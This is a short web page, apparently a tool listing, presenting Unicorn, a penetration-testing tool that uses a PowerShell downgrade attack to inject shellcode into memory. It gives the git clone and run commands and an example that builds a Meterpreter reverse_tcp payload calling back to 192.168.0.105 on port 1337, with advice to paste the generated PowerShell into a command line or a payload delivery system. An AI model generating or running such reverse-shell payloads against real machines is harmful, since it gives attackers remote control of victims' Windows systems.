Unicorn

PowerShell downgrade attack

 

Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber’s PowerShell attacks and the PowerShell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.

Usage is simple, just run Magic Unicorn (ensure Metasploit is installed and in the right path) and magic unicorn will automatically generate a PowerShell command that you need to simply cut and paste the PowerShell code into a command line window or through a payload delivery system.

Download

git clone https://github.com/trustedsec/unicorn.git
python unicorn.py

 Usage

python unicorn.py payload reverse_ipaddr port
Example:
python unicorn.py windows/meterpreter/reverse_tcp 192.168.0.105 1337

Loading